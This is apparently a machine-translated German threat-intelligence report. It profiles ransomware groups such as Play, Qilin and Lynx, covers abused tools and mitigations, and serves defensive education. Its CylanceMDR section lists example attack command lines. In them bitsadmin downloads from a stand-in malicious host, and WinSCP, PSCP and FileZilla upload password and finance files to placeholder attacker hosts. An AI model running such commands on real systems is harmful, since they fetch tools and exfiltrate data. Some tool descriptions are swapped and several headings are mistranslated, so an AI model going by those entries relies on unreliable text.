Play ist eine Ransomware-Gruppe, die erstmals im Juni 2022 auftauchte. Play hat Hunderte von Unternehmen in einer Vielzahl von Branchen in Nordamerika, Südamerika und Europa angegriffen, wobei der Schwerpunkt auf den USA und Kanada liegt. Play wendet in der Regel eine doppelte Erpressungstaktik an und droht damit, die gestohlenen Daten der Opferunternehmen zu veröffentlichen.
Um sich zunächst Zugang zu einem Zielsystem oder -netzwerk zu verschaffen, missbraucht Play gültige Konten und anfällige öffentliche Anwendungen in Windows-Umgebungen. Nach dem Aufspüren von Netzwerken mit Tools wie AdFind bewegen sie sich seitlich mit Tools wie PsExec und Cobalt Strike und verwenden zusätzliche Tools wie Mimikatz, um Anmeldedaten von Domänenadministratoren zu erhalten. Sobald Geräte mit sensiblen Informationen identifiziert sind, sammelt die Gruppe die Dateien in RAR-Archiven, exfiltriert sie dann mit WinSCP und verschlüsselt schließlich die Dateien auf den geplünderten Geräten.
Im Juli wurde Play bei der Verwendung einer neuen Linux-Variante seiner Ransomware beobachtet, die nur auf Dateien abzielt, die in VMware ESXi-Umgebungen ausgeführt werden.
-
Jäger International
Hunters International, das erstmals im Oktober 2023 identifiziert wurde, weist bemerkenswerte Ähnlichkeiten mit der Ransomware Hive auf. Als die Betreiber von Hunters International die Malware und Infrastruktur der Hive-Gruppe erwarben, unterschieden sie sich von Hive durch die Vermarktung verbesserter Funktionen.
Ihre Operationen konzentrieren sich in erster Linie auf doppelte Erpressung, wobei die Exfiltration von Daten und die Verwendung gestohlener Informationen im Vordergrund stehen, um die Opfer zur Zahlung von Lösegeld zu zwingen. Die Gruppe verwendet auch Dateiverschlüsselung mit ChaCha20-Poly1305 und RSA Optimal Asymmetric Encryption Padding (OAEP), was dazu führt, dass die Dateien mit der Erweiterung ".LOCKED" gekennzeichnet sind.
Typische Angriffsketten beginnen mit Phishing-Kampagnen oder dem Ausnutzen einer Sicherheitslücke. Die Gruppe hat es auf eine Reihe von Sektoren abgesehen, darunter die Fertigungsindustrie, das Gesundheitswesen und das Bildungswesen. Dabei verfolgt sie einen opportunistischen Ansatz, ohne sich auf eine bestimmte Region oder Branche zu konzentrieren, und kompromittiert Ziele in Nordamerika, Europa und Afrika. Ein Schlüsselwerkzeug in ihrem Arsenal ist SharpRhino, eine als legitime Software getarnte Backdoor, die neben aggressiven Maßnahmen zur Deaktivierung von Backup-Systemen eingesetzt wird, indem sie eine Reihe von Befehlen ausführt und versucht, bestimmte Dienste und Prozesse zu beenden, die normalerweise mit der Systemwiederherstellung verbunden sind.
Im vergangenen Quartal war Hunters International in der Tat sehr aktiv und hatte es auf alle Arten von Unternehmen, Branchen und geografischen Regionen abgesehen, was ihre Anpassungsfähigkeit und ihr breites Bedrohungspotenzial unterstreicht. Sie sind für ihre etwas hinterhältige Taktik bekannt, Opfer, die es geschafft haben, ihre Systeme aus Backups wiederherzustellen, ohne das Lösegeld zu bezahlen, entweder mit einer zweiten Dosis ihrer eigenen Ransomware oder einer anderen Variante zu infizieren.
-
Miau-Lecks | MeowCorp
Meow Leaks ist eine Bedrohungsgruppe mit möglichen Verbindungen zur Meow-Ransomware-Gruppe (auch als MeowCorp und Meow2022 bekannt), die 2022 als eine Variante der Conti-Ransomware auftauchte. Diese neue Meow-Gruppe, die Ende 2023 auftauchte, konzentriert ihre Bemühungen auf den Verkauf gestohlener Daten über eine Tor-basierte, gleichnamige "Meow Leaks"-Seite.
Meow behauptet, nicht mit Ransomware zu handeln; die Gruppe hat in einem Interview öffentlich erklärt, dass sie nicht an Conti beteiligt ist und derzeit keine Verbindung zu MeowCorp hat. Dies spiegelt sich in der begrenzten Liste der Opfer im Dark Web wider, die sich bisher hauptsächlich auf Ziele in den USA konzentriert hat, obwohl es auch einige internationale Opfer gibt. Dies stuft sie in erster Linie als eine auf Erpressung basierende Bedrohungsgruppe ein, da sie sich nicht auf die Verschlüsselung der Originaldaten verlassen kann, um ihre Opfer zur Zahlung zu zwingen.
Unabhängig von ihren Verbindungen zur ursprünglichen Ransomware-Gruppe hatte die neue Meow Leaks-Bedrohungsgruppe in diesem Quartal einen deutlichen Aktivitätsanstieg zu verzeichnen, wie ihre wachsende Leak-Site beweist. Ein kostenloses Entschlüsselungsprogramm für Opfer von MeowCorp namens RakhniDecryptor wurde im März von Sicherheitsforschern veröffentlicht. Das Entschlüsselungstool kann Dateien mit den Dateierweiterungen .KREMLIN, .RUSSIA und .PUTIN entschlüsseln. (Frühere Angriffe von MeowCorp mit dem Conti-basierten Verschlüsselungsprogramm richteten sich zunächst gegen russische Organisationen).
-
Qilin
Qilin ist ein RaaS, das seit 2022 aktiv ist und weiterhin auf das Gesundheitswesen und verschiedene andere Branchen weltweit ausgerichtet ist. Ursprünglich als "Agenda" im Juli 2022 gestartet, wurde das Unternehmen in "Qilin" umbenannt und firmiert nun unter diesem Namen.
Qilin-Ransomware umfasst Varianten, die in Golang und Rust geschrieben sind, und verschafft sich häufig durch Spearphishing-Angriffe Zugang zu einem Opfer. Die Gruppe nutzt Tools zur Fernüberwachung und -verwaltung (RMM) sowie Cobalt Strike für die Bereitstellung von Binärdateien. Während eines Angriffs lokalisiert Qilin den Domain-Controller des Ziels und führt ein Skript zum Abfangen von Anmeldeinformationen aus, das speziell auf die in Google Chrome gespeicherten Passwörter authentifizierter Benutzer abzielt. Qilin ist für seine doppelten Erpressungsstrategien bekannt und fordert Lösegeldzahlungen, um die Veröffentlichung der gestohlenen Daten zu verhindern.
-
LockBit
LockBit ist eine bekannte cyberkriminelle Gruppe mit russischen Verbindungen, die sich auf die Bereitstellung von RaaS durch ihre gleichnamige Malware spezialisiert hat. Die Betreiber der Gruppe pflegen und aktualisieren die Ransomware fleißig, beaufsichtigen die Verhandlungen und orchestrieren ihren Einsatz, sobald ein erfolgreicher Einbruch stattgefunden hat. Mit einer doppelten Erpressungsstrategie verschlüsselt LockBit nicht nur lokale Daten, um den Zugriff der Opfer auf ihre Dateien einzuschränken, sondern exfiltriert auch sensible Informationen und droht mit der Veröffentlichung von Daten, wenn kein Lösegeld gezahlt wird.
-
Die wichtigsten von Bedrohungsakteuren missbrauchten Tools
Tools wie AnyDesk, PowerShell und Cobalt Strike sind für die Datenverwaltung, Penetrationstests und Systemwartung unerlässlich. Ihre Flexibilität und Zugänglichkeit machen sie auch zu nützlichen Werkzeugen, die von Bedrohungsakteuren missbraucht werden können.
-
AnyDesk
AnyDesk ist eine Remote-Desktop-Anwendung, die Benutzern Fernzugriff und technische Unterstützung bietet und verschlüsselten Zugriff und Dateiübertragungen ermöglicht. AnyDesk ist ein legitimes Dienstprogramm, das von Bedrohungsakteuren wie der Akira-Ransomware-Gruppe für C2 und Datenexfiltration missbraucht wird. -
PowerShell
Microsoft PowerShell ist eine leistungsstarke Befehlszeilen-Shell und Skriptsprache, die für die Automatisierung von Aufgaben und die Verwaltung von Windows-Systemen entwickelt wurde. Sie wird weltweit von Administratoren und Sicherheitsexperten eingesetzt und unterstützt die Automatisierung von Routineaufgaben, die Systemverwaltung und die Reaktion auf Sicherheitsvorfälle. Ihre Vielseitigkeit macht sie jedoch auch zu einem Ziel für den Missbrauch durch Angreifer, die PowerShell ausnutzen können, um sich unbefugten Zugriff zu verschaffen und bösartigen Code auszuführen. Die eigentliche Gefahr liegt in der Fähigkeit von PowerShell, Skripts sowohl von der Festplatte als auch direkt im Speicher auszuführen, was "dateilose" Malware-Angriffe ermöglicht, die nur schwer zu erkennen sind.
Lesen Sie den Bericht unseres MDR-Teams über einen PowerShell-Vorfall.
-
Kobaltstreik
Cobalt Strike dient als hochentwickeltes Simulations-Framework für Angreifer, das sorgfältig entwickelt wurde, um die ständige Präsenz von Bedrohungsakteuren in Netzwerkumgebungen zu replizieren. Cobalt Strike ist um zwei zentrale Komponenten herum aufgebaut - einen Agenten (Beacon) und einen Server (Team Server) - und sorgt für eine nahtlose Interaktion. Der Cobalt Strike Team Server fungiert als Langzeit-C2-Server im Internet und steht in ständiger Kommunikation mit Beacon-Nutzlasten, die auf den Rechnern der Opfer installiert sind.
Cobalt Strike wird zwar in erster Linie als legitimes Tool für Penetrationstester und Red-Teamer zur Bewertung der Sicherheitslage von Netzwerken eingesetzt, wurde aber auch von Bedrohungsakteuren für schändliche Zwecke missbraucht. Es ist auch schon vorgekommen, dass sein Code online durchgesickert ist, was dazu geführt hat, dass er von einer Vielzahl von Gegnern schnell als Waffe eingesetzt wurde. Diese doppelte Natur macht deutlich, wie wichtig Wachsamkeit und robuste Cybersicherheitsmaßnahmen sind, um die mit dem Missbrauch verbundenen Risiken zu mindern.
-
Metasploit
Das Metasploit Framework ist ein frei verfügbares Framework für Penetrationstests mit einer Vielzahl von Tools, wird aber auch häufig von böswilligen Entitäten zur Ausnutzung von Schwachstellen verwendet. Die Meterpreter-Nutzlast, ein Post-Exploitation-Tool, das den Shell-Zugriff auf einen Zielcomputer erleichtert, bietet eine Vielzahl von Erweiterungen, darunter auch eine Mimikatz-Erweiterung. Sein leistungsstarkes Toolset und seine weite Verbreitung bedeuten, dass es von Bedrohungsgruppen genutzt werden kann, die von Cyberkriminalität bis hin zu staatlich gesponserten Gruppen reichen. Metasploit wurde bereits von bekannten bösartigen Gruppen wie LockBit, Cuba ransomware und Turla verwendet. -
WinSCP
WinSCP (Windows Secure Copy) ist ein kostenloser Open-Source-Client für die Protokolle SFTP, FTP, WebDAV und SCP, der für Microsoft Windows entwickelt wurde. Er ermöglicht sichere Dateiübertragungen zwischen lokalen und entfernten Computern und nutzt verschlüsselte Protokolle wie SFTP, um die Datensicherheit zu gewährleisten. Seine Fähigkeiten machen es jedoch auch zu einem Tool der Wahl für Bedrohungsakteure. Angreifer können WinSCP nutzen, um heimlich große Datenmengen zu exfiltrieren, Malware auf Zielserver hochzuladen, um das System weiter zu kompromittieren, und sich Fernzugriff zu verschaffen, um beliebige Befehle auszuführen oder zusätzliche bösartige Software zu installieren und die Kontrolle über kompromittierte Systeme zu behalten.
In unserem Abschnitt CylanceMDR Bedrohungen und Abhilfemaßnahmen untersuchte unser CylanceMDR -Team die häufigsten Tools, die in unseren Kundenumgebungen für die Exfiltration verwendet werden könnten. Das Team fand heraus, dass WinSCP 51 % der am häufigsten missbrauchten Exfiltrationstools auf Kundensystemen ausmachte.
Aufstrebende Gruppen im Blickpunkt - Lynx Ransomware
Die Lynx-Ransomware-Gruppe tauchte erstmals im Juli 2024 in der Bedrohungslandschaft auf und zählte in den folgenden Monaten schnell mehr als 25 Opfer. Die angegriffenen Unternehmen waren über eine Vielzahl von Branchen verteilt und befanden sich hauptsächlich in Nordamerika und Europa.
Was ist die Lynx-Gruppe?
Wie viele andere Ransomware-Betreiber verwendet auch die Lynx-Gruppe eine doppelte Erpressungsstrategie. Nachdem sie sich unrechtmäßig Zugang zu einem System oder Netzwerk verschafft haben, exfiltrieren sie zunächst sensible Daten, bevor sie diese verschlüsseln und für den Besitzer unzugänglich machen. Anschließend drohen sie damit, die Daten öffentlich zu veröffentlichen, wenn das Lösegeld nicht gezahlt wird. Wenn ein Unternehmen von Lynx infiltriert wurde, veröffentlicht die Gruppe eine Blog auf einer Leak-Site - die über das öffentliche Internet oder das Dark Web oder manchmal auch über beide zugänglich ist -, um das Opfer zu "beschämen".
Von Lynx anvisierte Branchen und Regionen
Wie Lynx arbeitet
Lynx unterhält sowohl eine Surface-Website als auch eine Deep-Web-Leak-Website sowie eine Reihe gespiegelter Websites, die sich unter ".onion"-Adressen befinden - vermutlich, um die Betriebszeit sicherzustellen, falls eine ihrer Websites von den Strafverfolgungsbehörden offline genommen wird. Lynx verwendet auch einen eigenen Verschlüsselungscode, der bei näherer Betrachtung durch BlackBerry-Forscher aus der gleichen Codebasis entwickelt zu sein scheint wie der der berüchtigten INC Ransom-Gruppe.
Bisher wurden eine Handvoll Samples, die mit dem von der Lynx-Gruppe verwendeten Verschlüsselungsprogramm zusammenhängen, in freier Wildbahn identifiziert. Alle Beispiele scheinen in C++ geschrieben zu sein und weisen keinerlei Verpackung oder Verschleierung auf, um eine Analyse zu erschweren.
Sobald die Ziele vor der Verschlüsselung, wie z. B. die Erlangung des Erstzugriffs und die Datenexfiltration, erreicht sind, wird die Ransomware in der Umgebung des Opfers installiert. Die Ransomware selbst ist so konzipiert, dass sie über die Befehlszeilenkonsole ausgeführt wird und mehrere optionale Argumente unterstützt. So kann der Angreifer seine Vorgehensweise bei der Dateiverschlüsselung an seine Ziele anpassen.
Bei der Ausführung unterstützt die Malware außerdem einen "--verbose"-Modus, der eine Liste der Operationen ausgibt, die die Ransomware während ihrer dynamischen Ausführung durchführt.
Um zu verhindern, dass das Gerät eines Opfers funktionsunfähig wird, lässt die Malware bestimmte Dateitypen und Windows-Ordner von der Verschlüsselung aus. Dies dient einem doppelten Zweck, indem es die Verschlüsselung beschleunigt und verhindert, dass wichtige Windows-Programme unzugänglich werden, was das Gerät "blockieren" und die Chance der Gruppe, Lösegeld zu erpressen, zunichte machen würde.
Eine ausführlichere Analyse dieser neuen Bedrohung finden Sie in unserem vollständigen Bericht über Lynx.
-
Strategien zur Risikominderung
Neue Bedrohungen und Bedrohungsgruppen entwickeln sich ständig weiter und stellen neue Herausforderungen dar. Unternehmen, die ihre digitalen Werte schützen wollen, müssen eine umfassende Cybersicherheitsstrategie verfolgen, die robuste Abwehrmaßnahmen und Mitarbeiterschulungen umfasst. Im Folgenden werden einige wichtige Strategien vorgestellt, die zur Abwehr von Cyberbedrohungen wie der Lynx-Ransomware-Gruppe eingesetzt werden können.
-
Schutz der Infrastruktur
Die Implementierung einer Netzwerksegmentierung ist ein grundlegender Schritt zur Eindämmung potenzieller Sicherheitsverletzungen.
- Taktik: Durch die Aufteilung des Netzwerks in verschiedene Segmente gemäß einer Systemklassifizierungsrichtlinie können Unternehmen Engpässe schaffen, die die Manövrierfähigkeit eines Angreifers einschränken, die Schutzzeit verlängern und mehr Möglichkeiten für die Entdeckung des Angreifers schaffen.
- Beispiel: Ein großer Gesundheitsdienstleister vereitelt einen Cyberangriff, indem er seine Patientendatenserver von seinem allgemein genutzten Netzwerk isoliert und so sicherstellt, dass wichtige Daten auch dann noch sicher sind, wenn andere Teile des Netzwerks kompromittiert werden.
-
Backup-Lösungen
Unternehmen sollten aktuelle Offline-Kopien von Daten in einer separaten Backup-Infrastruktur aufbewahren, die von den primären Netzwerken aus nicht zugänglich ist.
- Taktik: Unterhalten Sie eine separate Backup-Infrastruktur.
- Beispiel: Dieser Ansatz wird erfolgreich von einem globalen Fertigungsunternehmen angewandt, das regelmäßig Daten-Snapshots erstellt und offline speichert, um die Integrität und Verfügbarkeit der Daten auch nach einem Ransomware-Angriff sicherzustellen.
-
Aufdeckungs- und Reaktionsfähigkeiten
Unternehmen sollten auf bestimmte Indikatoren achten; im Falle eines Lynx-Angriffs auf das Auftreten von Dateierweiterungen wie ".LYNX" oder die Erstellung von Dateien mit dem Namen "README.txt", einem typischen Dateinamen für Erpresserbriefe.
- Taktik: Frühwarnsysteme können ungewöhnliche Datenübertragungsmuster oder massenhafte Dateiveränderungen erkennen und so eine schnelle Reaktion auf mögliche Verstöße ermöglichen.
- Beispiel: Ein Finanzinstitut vermeidet einen bedeutenden Datenverstoß, indem es Endpunkt-Erkennung und -Reaktion einsetzt, die unbefugten Zugriff auf seine Backup-Systeme nach Geschäftsschluss erkennen lässt.
-
Überwachung und Verwaltung der Zugangskontrolle
Die Zugriffsverwaltung ist eine Sicherheitspraxis, die sich auf die Kontrolle und Überwachung des Zugriffs auf Systeme, Ressourcen und Daten innerhalb eines Unternehmens konzentriert. Die Implementierung einer umfassenden Überwachung der Zugriffskontrolle kann Unternehmen dabei helfen, unbefugte Zugriffsversuche auf wichtige Systeme zu erkennen und zu verhindern.
- Taktik: Führen Sie eine detaillierte Protokollierung aller Zugriffsversuche auf sensible Systeme und Daten ein. Überprüfen Sie die Zugriffsprotokolle regelmäßig auf verdächtige Muster. Implementieren Sie automatische Warnmeldungen für ungewöhnliches Zugriffsverhalten. Führen Sie strenge Zugriffskontrolllisten (ACLs) mit regelmäßigen Überprüfungen der Benutzerrechte.
- Beispiel: Ein Finanzdienstleistungsunternehmen erkennt und verhindert eine potenzielle Datenverletzung, indem es ungewöhnliche Zugriffsmuster durch sein Überwachungssystem identifiziert, das mehrere fehlgeschlagene Anmeldeversuche von einem autorisierten Benutzerkonto außerhalb der normalen Arbeitszeiten anzeigen könnte.
-
Planung der Reaktion auf Vorfälle
Ein gut definierter Plan für die Reaktion auf Zwischenfälle (IR) ermöglicht es Unternehmen, schnell und effektiv auf Cybersecurity-Vorfälle zu reagieren und so den potenziellen Schaden und die Wiederherstellungszeit zu minimieren.
- Taktik: Entwickeln Sie detaillierte Verfahren für die Reaktion auf Vorfälle, legen Sie klare Rollen und Zuständigkeiten fest, führen Sie aktualisierte Kontaktlisten für die wichtigsten Beteiligten und externen Ressourcen (Strafverfolgungsbehörden, Unternehmen für die Reaktion auf Vorfälle) und führen Sie regelmäßig Übungen durch, um die Wirksamkeit der Reaktion zu testen.
- Beispiel: Ein Fertigungsunternehmen könnte einen Ransomware-Vorfall innerhalb von Stunden eindämmen, indem es seinen getesteten Notfallplan befolgt, der Verfahren zur sofortigen Systemisolierung und vorab eingerichtete Kommunikationskanäle mit seinem Notfallteam umfasst.
-
Sicherheit der Lieferkette
Die Bewertung der Sicherheitslage der wichtigsten Produkte mit Zugang zu Ihrem Netzwerk ist von entscheidender Bedeutung.
- Taktik: Implementieren Sie ein Risikomanagementprogramm für die Lieferkette, ein Sicherheitstestverfahren für Produkte mit Zugang zu kritischen Systemen und überprüfen Sie regelmäßig die Zugriffsberechtigungen Dritter, um die Risiken in der Lieferkette zu verringern.
- Beispiel: Ein Pharmaunternehmen könnte die Sicherheit seiner Lieferkette verbessern, indem es gründliche Sicherheitsbewertungen durchführt und sicherstellt, dass alle Partner strenge Cybersicherheitsstandards einhalten.
-
Bewährte Technologien zur Verteidigung
Der Einsatz fortschrittlicher Sicherheitstechnologien wie EDR-Lösungen, E-Mail-Filterung und Anwendungs-Whitelisting auf kritischen Systemen kann die Sicherheitslage eines Unternehmens erheblich verbessern.
- Taktik: Einrichtung von Funktionen zur kontinuierlichen Netzwerküberwachung und Bedrohungsjagd.
- Beispiel: Ein Telekommunikationsunternehmen identifiziert und neutralisiert eine fortgeschrittene anhaltende Bedrohung (APT) durch proaktive Bedrohungsjagd.
Operative Sicherheitsmaßnahmen
Regelmäßige Schulungen zum Sicherheitsbewusstsein sind für eine wachsame Unternehmenskultur unerlässlich. Themen wie Phishing-Prävention, Sicherheit von Anmeldedaten und Fernzugriffssicherheit sollten dabei im Vordergrund stehen.
- Taktik: Implementieren Sie ein "Spot the Red Flag"-Schulungsprogramm, bei dem die Mitarbeiter simulierte Phishing-E-Mails erhalten, die gängige Täuschungselemente enthalten, gefolgt von einem sofortigen pädagogischen Feedback, das jeden verdächtigen Indikator erklärt. Verfolgen Sie die Reaktionsraten der Mitarbeiter und bieten Sie gezielte Nachschulungen auf der Grundlage individueller Leistungskennzahlen an.
- Beispiel: Ein internationaler Einzelhändler reduziert seine Phishing-Vorfälle erheblich, indem er ein umfassendes Schulungsprogramm in Verbindung mit einem robusten Patch-Management-System einführt, um Schwachstellen umgehend zu beheben.
- Es genügt ein einziger Mitarbeiter, der auf einen bösartigen Link klickt, um die Systeme und die Infrastruktur eines Unternehmens zu gefährden. Hier finden Sie ein Beispiel für eine Phishing-Nachricht, die Sie in Ihr Training einbauen können.
- Die E-Mail-Adresse des Absenders behauptet, sie stamme von "linkedincdn.com" und nicht von der offiziellen LinkedIn.com-Domain - eine klassische Domain-Spoofing-Technik.
- Ein Warnbanner weist darauf hin, dass dies von einer externen Quelle stammt. Dies ist ein nützliches Sicherheitsmerkmal, das viele Unternehmen implementieren möchten.
- Die Nachricht verwendet zwei klassische Social-Engineering-Taktiken. Sie gibt vor, von einer hochrangigen Führungskraft (CISO) im Unternehmen der Zielperson zu stammen, und nutzt Schmeicheleien ("Ich habe viel Gutes über Sie gehört"), um zum Engagement zu bewegen.
- Das Exemplar ist uneinheitlich formatiert: Rechtschreib- und Grammatikfehler sind überall zu finden.
- Obwohl das Profilfoto den Anschein der Echtheit erweckt, können diese Fotos von jedem, der weiß, wie man mit der rechten Maustaste klickt und "Bild speichern unter" wählt, leicht von einem legitimen Profil kopiert werden.
- Das Erscheinungsbild der E-Mail ahmt die üblichen automatisierten Nachrichten nach, die von Social-Media-Websites an Nutzer verschickt werden.
- Bei den Schaltflächen "Akzeptieren" und "Profil anzeigen" handelt es sich wahrscheinlich um bösartige Links, die zu Seiten zum Sammeln von Anmeldeinformationen oder zum Herunterladen von Malware führen können.
- Der Link "Abmelden" am Ende der Nachricht kann ebenfalls bösartig sein. Phisher fügen diese oft ein, um legitim zu erscheinen, während sie die Nutzer in Wirklichkeit zu schädlicheren Inhalten führen.
Helfen Sie Ihren Mitarbeitern, das zu lernen:
- Überprüfen Sie die E-Mail-Domänen der Absender sorgfältig.
- Seien Sie misstrauisch gegenüber unaufgeforderten Verbindungsanfragen, insbesondere von hochrangigen Führungskräften.
- Klicken Sie niemals auf Schaltflächen oder Links in verdächtigen E-Mails - stattdessen sollten Sie die betreffende Website besuchen, indem Sie die URL direkt in Ihren Browser eingeben.
- Achten Sie auf die Sicherheitswarnungen in ihrem E-Mail-System.
- Seien Sie vorsichtig mit Schmeicheleien oder Dringlichkeit bei unerwarteten Anfragen für berufliche Kontakte.
Cyberkriminelle verfeinern ihre Cyberangriffe ständig, um ihre Wirkung zu verstärken. Um sich gegen diese sich ständig weiterentwickelnden Bedrohungen zu schützen, müssen Unternehmen einen vorausschauenden Ansatz für ihre Cyber-Sicherheitsstrategien wählen. Dazu gehören strategische Investitionen in Technologien - wie Sicherheitsüberwachung, Mitarbeiterschulung und Reaktion auf Vorfälle - um sicherzustellen, dass sie auf ausgeklügelte Cyberbedrohungen vorbereitet sind.
Cyber Story Highlight: Coyote-Bankentrojaner zielt auf Lateinamerika und konzentriert sich auf brasilianische Finanzinstitute
CylanceMDR: Bedrohungen und Abhilfemaßnahmen
Unternehmen sind nicht nur durch die Malware von Bedrohungsakteuren, sondern auch durch den Missbrauch legitimer Tools gefährdet. In diesem Abschnitt werden die häufigsten Bedrohungen vorgestellt, auf die das CylanceMDR™-Team in diesem Quartal in den Netzwerkumgebungen von Kunden gestoßen ist, sowie Abhilfemaßnahmen, die Unternehmen zur Stärkung ihrer Cyberabwehr einsetzen können.
CylanceMDR ist unser abonnementbasierter MDR-Service, der eine 24x7-Überwachung bietet und Unternehmen dabei hilft, ausgeklügelte Cyber-Bedrohungen abzuwehren, indem er Lücken in Sicherheitsumgebungen schließt.
LOLBAS Aktivität
LOLBAS bezieht sich auf integrierte Windows-Systemtools und legitime ausführbare Dateien, die Angreifer für bösartige Zwecke missbrauchen können. Der Begriff "vom Land leben" bedeutet, dass Tools verwendet werden, die bereits in der Zielumgebung ("das Land") vorhanden sind, anstatt zu riskieren, neue Malware einzuführen, die Sicherheitssysteme auslösen und das Ziel darauf aufmerksam machen könnte, dass es kompromittiert wurde. Die Gefahr von LOLBAS-basierten Angriffen liegt in ihrer Fähigkeit, Sicherheitskontrollen zu umgehen, da sie legitime Systemtools verwenden. Dies macht die Entdeckung schwierig, da die Systemaktivitäten auf den ersten Blick normal erscheinen.
Während des Berichtszeitraums wurden die folgenden LOLBAS-Aktivitäten beobachtet:
- Bitsadmin ist nach wie vor das meistbeachtete LOLBAS.
- Certutil ist das am zweithäufigsten beobachtete Mittel, obwohl seine Verwendung seit dem letzten Berichtszeitraum zurückgegangen ist.
- Regsvr32, MSHTA und PsExec wurden ebenfalls beobachtet, machen aber nur einen geringen Prozentsatz der Gesamtaktivität aus.
Im Folgenden wird ein Beispiel für die böswillige Verwendung von LOLBAS gezeigt.
Abbildung 14: LOLBAS-Aktivität, Juli - September 2024.
Datei: Bitsadmin.exe
MITRE ATT&CK ID: T1197 | T1105
How It Can Be Abused: Download/upload from or to malicious host (Ingress tool transfer). Can be used to execute malicious process.
Example Command-Line:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest
Datei: mofcomp.exe
MITRE ATT&CK ID: T1218
How It Can Be Abused: Can be used to install malicious managed object format (MOF) scripts.
MOF statements are parsed by the mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository.
Example Command-Line:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof
Exfiltrations-Tools
Bei Exfiltrationstools handelt es sich um Software, die zur Übertragung von Daten aus einer Zielumgebung heraus verwendet wird, häufig zu bösartigen Zwecken. In diesem Quartal untersuchte das Team von CylanceMDR die gängigsten Tools, die in unseren Kundenumgebungen zur Exfiltration verwendet werden könnten (ohne RMM-Tools).
Abbildung 15: Prozentsatz der missbrauchten Exfiltrationstools, Juli - September 2024.
WinSCP
Beschreibung: WinSCP ist ein Dateiübertragungsclient; PuTTY ist ein sicherer Shell-Client (SSH).
Beispiel Befehlszeile: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto
Hinweis: Wird häufig in Verbindung mit einer grafischen Benutzeroberfläche (GUI) verwendet.
GEHRUNG ATT&CK ID: T1048
PSCP
Beschreibung: PuTTY Secure Copy Protocol (PSCP) ist ein Befehlszeilendienstprogramm für die Übertragung von Dateien und Ordnern.
Beispiel Befehlszeile: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp
GEHRUNG ATT&CK ID: T1021.004
FileZilla
Beschreibung: FileZilla ist ein bekanntes FTP-Tool (File Transfer Protocol), das auf verschiedenen Betriebssystemen verwendet werden kann.
Beispiel Befehlszeile: filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"
GEHRUNG ATT&CK ID: T1071.002
FreeFileSync
Beschreibung: PuTTY Secure Copy Protocol (PSCP) ist ein Befehlszeilendienstprogramm für die Übertragung von Dateien und Ordnern.
Beispiel Befehlszeile: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp
GEHRUNG ATT&CK ID: T1021.004
Rclone
Beschreibung: FreeFileSync ist ein Synchronisationstool, das zur Verwaltung von Backups verwendet werden kann.
Beispiel Befehlszeile: FreeFileSync.exe google_drive_sync.ffs_batch
Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />
GEHRUNG ATT&CK ID: T1567.002
Tools zur Fernüberwachung und -verwaltung
Bedrohungsakteure missbrauchen RMM-Tools. Diese Tools bieten Angreifern eine einfache Möglichkeit, dauerhaften und einfachen Zugriff auf Systeme zu erhalten und Daten effizient zu exfiltrieren. Wie in unserem letzten Global Threat Intelligence Report festgestellt, ist dies die am schnellsten wachsende Kategorie für Ransomware-Gruppen, die diese Tools nutzen, um Daten aus Opferumgebungen zu exfiltrieren. In diesem Berichtszeitraum hat das Team von CylanceMDR die am häufigsten genutzten RMM-Tools in den Umgebungen unserer Kunden untersucht.
Bei unserer Analyse haben wir festgestellt, dass viele Kunden mehrere RMM-Tools in ihren Umgebungen einsetzen und damit die Angriffsfläche und das Risiko für ihr Unternehmen erhöhen.
Abbildung 16: Dieses Diagramm veranschaulicht den Prozentsatz der Angriffe, die durch den Missbrauch führender RMM-Tools ausgeführt werden.
Zu den vorgeschlagenen Abhilfemaßnahmen gehören:
1. Audit von Fernzugriffswerkzeugen
- Ermittlung der derzeit in der Organisation verwendeten RMM-Tools.
- Bestätigen Sie, dass sie in der Umgebung zugelassen sind.
- Wenn Sie mehrere RMM-Tools verwenden, prüfen Sie, ob diese konsolidiert werden können. Durch die Reduzierung der Anzahl der verschiedenen Tools wird das Risiko verringert.
2. Deaktivieren von Ports und Protokollen
- Blockieren Sie die ein- und ausgehende Netzwerkkommunikation zu häufig verwendeten Ports, die mit nicht zugelassenen Fernzugriffstools verbunden sind.
- Verwenden Sie bei den Firewall-Regeln und der Anwendungskontrolle eher Standardverweigerungsregeln und Erlaubnislisten als eine Blockliste.
3. Überwachung von Endpunktaktivitäten und Netzwerkverkehr
- Erkennung der anormalen Verwendung von Fernzugriffstools.
4. Flicken
- Gewährleistung einer regelmäßigen Überprüfung der Schwachstellen im Zusammenhang mit den zulässigen RMM-Tools und gegebenenfalls Aktualisierung.
- Bevorzugen Sie bei der Durchführung regelmäßiger Patch-Zyklen Systeme, die über das Internet zugänglich sind.
5. Netzsegmentierung
- Minimieren Sie böswillige Seitwärtsbewegungen, indem Sie das Netzwerk segmentieren und den Zugriff auf Geräte und Daten beschränken.
6. Gerätekennzeichnung
- Finden Sie heraus, ob Ihr Sicherheitsanbieter Optionen zur Kennzeichnung von Geräten anbietet, die RMM-Tools verwenden. Wenn ja, aktivieren Sie dies, um sicherzustellen, dass Ihr SOC Einblick hat. Einige Anbieter bieten die Möglichkeit, eine Notiz/Markierung zu hinterlassen, die genehmigte Tools/Aktivitäten identifiziert, was Analysten bei Untersuchungen sehr hilft.
7. Speicherladende RMM
- Verwenden Sie Sicherheitssoftware, die Fernzugriffe erkennen kann, die nur im Speicher geladen werden.
CylanceMDR Die wichtigsten vierteljährlichen Bedrohungen
Highlight: Warnungen vom BlackBerry Incident Response Team
Das BlackBerry Incident Response (IR)-Team bietet Unternehmen, die von einem Malware-Angriff oder einer vermuteten Datenverletzung betroffen sind, Abhilfe. In diesem Quartal verzeichnete unser IR-Team eine Zunahme von Angriffen auf mit dem Internet verbundene Dienste und den Missbrauch von Anmeldedaten ehemaliger Mitarbeiter.
